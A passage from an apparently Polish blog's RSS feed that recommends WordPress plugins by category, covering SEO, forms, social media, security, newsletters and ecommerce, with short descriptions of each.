 	<li><strong><a href="https://pl.wordpress.org/plugins/tinymce-advanced/" target="_blank" rel="nofollow noopener">TinyMCE Advanced</a></strong> &#8211; chcesz zmienić czcionkę, wyrównanie lub wybrać funkcję edycji tekstu, która domyślnie nie jest dostępna? TinyMCE daje możliwość dodatkoej edycji tekstu.</li>
 	<li><a href="https://buttonizer.pro/" target="_blank" rel="nofollow noopener"><strong>Buttonizer &#8211; Smart Floating Action Button</strong></a> &#8211; jest to narzędzie do tworzenia customowych przycisków, które mogą odsyłać użytkowników do naszych mediów społecznościowych lub zewnętrznych adresów url np. takich jak allegro.</li>
 	<li><strong><a href="https://pl.wordpress.org/plugins/formidable/" target="_blank" rel="noopener">Formidable Forms</a> i <a href="https://pl.wordpress.org/plugins/contact-form-7/" target="_blank" rel="noopener">Contact Form 7</a></strong> &#8211; wtyczki do tworzenia i zarządzania formularzami kontaktowymi.</li>
 	<li><strong><a href="https://pl.wordpress.org/plugins/the-post-grid/">The posts grid</a></strong> lub <a href="https://www.pickplugins.com/item/post-grid-create-awesome-grid-from-any-post-type-for-wordpress/"><strong>Posts Grid &#8211; </strong></a>wtyczki służące do zaciągania wszystkich wpisów dodanych na bloga na jedną stronę.</li>
</ol>								</div>
				</div>
				<div class="elementor-element elementor-element-12f5d2d elementor-widget elementor-widget-text-editor" data-id="12f5d2d" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p><strong>SEO, optymalizacja i pozycjonowanie</strong></p><ol><li><a href="https://pl.wordpress.org/plugins/wordpress-seo/" target="_blank" rel="nofollow noopener"><strong>Yoast SEO</strong></a> &#8211; umożliwia dodanie metatagów, słow kluczowych, podpiąć social media i wygenerować mapę strony, umożliwia dodanie tagów do kategorii, nie ma jednak możliwości zarządzania bezpośrednio zdjęciem przypasowanym do danego wpisu lub strony,</li><li><a href="https://pl.wordpress.org/plugins/all-in-one-seo-pack/" target="_blank" rel="nofollow noopener"><strong>All in One SEO Pack</strong></a> &#8211; wtyczka działająca identycznie jak Yoast, nie posiada jednak możliwości dodawania tagów do kategorii w wersji podstawowej, dużym jej atutem jest możliwość wgrania dowolnego zdjęcia do wpisu, które zostanie zaciągnięte przy udostępnianiu w social media.</li><li><a href="https://pl.wordpress.org/plugins/redirection/" target="_blank" rel="nofollow noopener"><strong>Redirection</strong></a> &#8211; sprawnie utworzy przekierowania 301 i rozwiąże problemy z błędem 404,</li><li><a href="https://pl.wordpress.org/plugins/wp-smushit/" target="_blank" rel="nofollow noopener"><strong>Smush Image</strong></a> &#8211; zmienia rozmiar, optymalizuj i kompresuj wszystkie obrazy, w ten sposób możesz zoptymalizować i przyśpieszyć działanie swojej strony www,</li><li><a href="https://pl.wordpress.org/plugins/google-analytics-dashboard-for-wp/" target="_blank" rel="nofollow noopener"><strong>Google Analytics Dashboard for WP (GADWP)</strong></a> &#8211; ułatwia podłączenie kodu śledzącego analytics</li><li><a href="https://pl.wordpress.org/plugins/insert-headers-and-footers/" target="_blank" rel="nofollow noopener"><strong>Insert Headers and Footers</strong></a> &#8211; wtyczka umożliwiająca dodanie dowolnego skryptu do sekcji nagłówka i stopki. Znakomicie sprawdza się przy podpięciu kodu śledzącego analytics, pixel facebook itp.</li><li><strong><a href="https://wordpress.org/plugins/hotjar/" target="_blank" rel="nofollow noopener">Hotjar</a></strong>&#8211; tworzy mapy ciepła, umożliwia nagrywanie ruch użytkownika po Twojej stronie.</li></ol>								</div>
				</div>
				<div class="elementor-element elementor-element-e874ee7 elementor-widget elementor-widget-text-editor" data-id="e874ee7" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p><strong>Prawne</strong></p><ol><li><a href="https://pl.wordpress.org/plugins/cookie-notice/" target="_blank" rel="nofollow noopener"><strong>Informacja o ciasteczkach</strong></a> &#8211; w prosty sposób stworzysz informację o plikach cookies oraz dodasz odnośnik do swojej polityki prywatności.</li></ol>								</div>
				</div>
				<div class="elementor-element elementor-element-419f9bb elementor-widget elementor-widget-text-editor" data-id="419f9bb" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p><strong>Ułatwiające pracę</strong></p><ol><li><a href="https://pl.wordpress.org/plugins/mystickymenu/" target="_blank" rel="nofollow noopener"><strong>Sticky Menu on Scroll, Sticky Header, Sticky Welcome Bar for Any Theme – myStickymenu</strong></a> &#8211; wtyczka umożliwia zaprojektowanie custom menu w wersji przyklejonej do góry strony.</li><li><a href="https://pl.wordpress.org/plugins/elementor/" target="_blank" rel="nofollow noopener"><strong>Elementor</strong></a> &#8211; wtyczka ułatwiająca projektowanie wyglądu stron i wpisów bez potrzeby posiadania umiejętności programistycznych, dość mocno okrojona w wersji podstawowej, natomiast w wersji rozszerzonej daje genialne możliwości zaprojektowania strony internetowej wg. swoich potrzeb. (Jeśli jesteś zainteresowana/y nabyciem wtyczki, skontaktuj się ze mną &#8211; przy większej ilości osób zainteresowanych można uzyskać całkiem fajną cenę.)</li><li><a href="https://www.elegantthemes.com/gallery/divi/" target="_blank" rel="nofollow noopener"><strong>Divi</strong></a> &#8211; kolejna wtyczka ułatwiająca projektowanie wyglądu stronu bez umiejętności programistycznych. Całkiem przyjemny design i łatwość obsługi sprawiają, że praca przy stronie internetowej staje się naprawdę łatwa. Posiada bardzo dużo możliwości i darmowych gotowych szablonów do wykorzystania w swojej stronie internetowej. (Podobnie jak elementor oferują bardzo atrakcyjną cenę przy większym zamówieniu &#8211; zbiorowym).</li><li><a href="https://pl.wordpress.org/plugins/loco-translate/" target="_blank" rel="nofollow noopener"><b>Loco Translate </b></a>&#8211; wtyczka umożliwiająca przetłumaczenie pojedynczych słów w motywie lub innych wtyczkach.</li><li><a href="https://pl.wordpress.org/plugins/safe-svg/" target="_blank" rel="nofollow noopener"><strong>Safe SVG </strong></a>i <strong><a href="https://pl.wordpress.org/plugins/svg-support/" target="_blank" rel="noopener">SVG Support</a></strong>&#8211; umożliwiają wgrywanie zdjęć i grafik w formacie .svg.</li></ol>								</div>
				</div>
				<div class="elementor-element elementor-element-454524e elementor-widget elementor-widget-text-editor" data-id="454524e" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<strong>Bezpieczeństwo</strong>
<ol>
 	<li><a href="https://pl.wordpress.org/plugins/akismet/" target="_blank" rel="nofollow noopener"><strong>Akismet Anti-Spam</strong></a> &#8211; zapewnia ochronę przed spamem, niechcianymi komentarzami i wiadomościami wysyłanymi przez roboty internetowe, należy pamiętać o aktywacji API.</li>
 	<li><a href="https://pl.wordpress.org/plugins/updraftplus/" target="_blank" rel="nofollow noopener"><strong>UpdraftPlus</strong></a> &#8211; umożliwia tworzenie kopii zapasowej Twoich plików i bazy danych.</li>
 	<li>
<p class="plugin-title"><a href="https://pl.wordpress.org/plugins/wp-maintenance-mode/" target="_blank" rel="nofollow noopener"><strong>WP Tryb Konserwacji</strong></a> i <a href="https://pl.wordpress.org/plugins/coming-soon/" target="_blank" rel="nofollow noopener"><strong>Coming Soon Page, Under Construction &amp; Maintenance Mode by SeedProd</strong></a> &#8211; wtyczki odpowiedzialne za stworzenie zaślepki informującej użytkowników o tym że strona jest w budowie lub konserwacji. Warto włączyć tryb konserwacji na czas aktualizacji wordpressa, wtyczek, motywów i wszelkich prac które mogą zagrażać pełnej sprawności i użyteczności dla użytkowników.</p>
</li>
 	<li><a href="https://wordpress.org/plugins/health-check/" target="_blank" rel="nofollow noopener"><strong>Health Check 
 Troubleshooting</strong></a> &#8211; genialna wtyczka wykrywająca problemy związane z wtyczkami i ogólnymi błędami WordPress, pozwala zidentyikować co powoduje problemy.</li>
</ol>								</div>
				</div>
				<div class="elementor-element elementor-element-1667d3e elementor-widget elementor-widget-text-editor" data-id="1667d3e" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p><strong>Social media</strong></p><ol><li><strong><a href="https://pl.wordpress.org/plugins/ultimate-social-media-icons/" target="_blank" rel="nofollow noopener">Social Media and Share Icons (Ultimate Social Media)</a></strong>&#8211; wtyczka umożliwiająca udostępnianie postów w social mediach.</li><li><a href="https://pl.wordpress.org/plugins/insta-gallery/" target="_blank" rel="nofollow noopener"><strong>Instagram Feed Gallery</strong></a> &#8211; umożliwia umieszczenie na stronie ramki z instagrama z najnowszymi zdjęciami, które zaciągają się automatycznie.</li><li><p class="plugin-title"><a href="https://pl.wordpress.org/plugins/sticky-side-buttons/" target="_blank" rel="nofollow noopener"><strong>Sticky Side Buttons</strong></a> &#8211; Umożliwia stworzenie przyklejonych przycisków kierujących do social media lub na dowolny adres url.</p></li><li><strong><a href="https://en-gb.wordpress.org/plugins/free-facebook-reviews-and-recommendations-widgets/https://en-gb.wordpress.org/plugins/free-facebook-reviews-and-recommendations-widgets/">Widgets for Social Reviews &amp; Recommendations &#8211;</a></strong><a href="https://en-gb.wordpress.org/plugins/free-facebook-reviews-and-recommendations-widgets/https://en-gb.wordpress.org/plugins/free-facebook-reviews-and-recommendations-widgets/"> </a>w ultra prosty i szybki sposób można zaciągnąć opinie z facebooka i wyświetlić je w bardzo łądnym designie.</li><li><a href="https://pl.wordpress.org/plugins/wp-facebook-reviews/" target="_blank" rel="nofollow noopener"><strong>WP Review Slider </strong></a>&#8211; dzięki niej możemy zaciągnąć opinie z naszego facebooka na stronę internetową.</li><li><p class="plugin-title"><strong><a href="https://pl.wordpress.org/plugins/disqus-comment-system/" target="_blank" rel="nofollow noopener">Disqus</a> &#8211;</strong> system komentowania z dodatkową wierzytelnością osób komentującyc.</p></li><li><strong><a href="https://pl.wordpress.org/plugins/meks-easy-instagram-widget/">Meks Instagram Settings</a></strong> &#8211; genialna wtyczka do zaciagania feedu z instagrama </li></ol>								</div>
				</div>
				<div class="elementor-element elementor-element-1841dbe elementor-widget elementor-widget-text-editor" data-id="1841dbe" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<strong>Newsletter</strong>
<ol>
 	<li><a href="https://pl.wordpress.org/plugins/mailchimp-for-wp/" target="_blank" rel="nofollow noopener"><strong>MC4WP: Mailchimp for WordPress</strong></a> &#8211; Umożliwia podłączenie naszej strony do zewnętrznej platformy Mailchimp, łączy nam listy subskrybentów i umożliwia zapis do listy.</li>
 	<li><a href="https://pl.wordpress.org/plugins/wordpress-popup/" target="_blank" rel="nofollow noopener"><strong>Hustle</strong></a> &#8211; służy do tworzenia okienek typu pop up, embed oraz innych, znakomicie łączy się z aplikacjami do wysyłania newsleterów, umożliwia tworzenie oryginalnych formularzy do zapisu.</li>
 	<li><strong><a href="https://pl.wordpress.org/plugins/getresponse-integration/" target="_blank" rel="nofollow noopener">GetResponse for WordPress</a> &#8211;</strong> aplikacja umożliwiająca podłączenie pod zewnętrzną aplikację Getresponse do rozsyłania newslettera.</li>
</ol>								</div>
				</div>
				<div class="elementor-element elementor-element-807355b elementor-widget elementor-widget-text-editor" data-id="807355b" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<strong>Ecommerce</strong>
<ol>
 	<li><a href="https://pl.wordpress.org/plugins/perfect-woocommerce-brands/" target="_blank" rel="nofollow noopener"><strong>Perfect WooCommerce Brands</strong></a> &#8211; Umożliwia dodanie siedbara z filtrami do naszego sklepu. Możemy filtrować po marce, cenie i atrybutach.</li>
</ol>								</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				</div><p></p>]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.boldgrid.com/w3-total-cache/?utm_source=w3tc&utm_medium=footer_comment&utm_campaign=free_plugin

Page Caching using Disk: Enhanced 
Lazy Loading (feed)
Database Caching 2/154 queries in 0.146 seconds using Disk

Served from: sklep.kobietakoduje.pl @ 2026-10-04 15:34:54 by W3 Total Cache
-->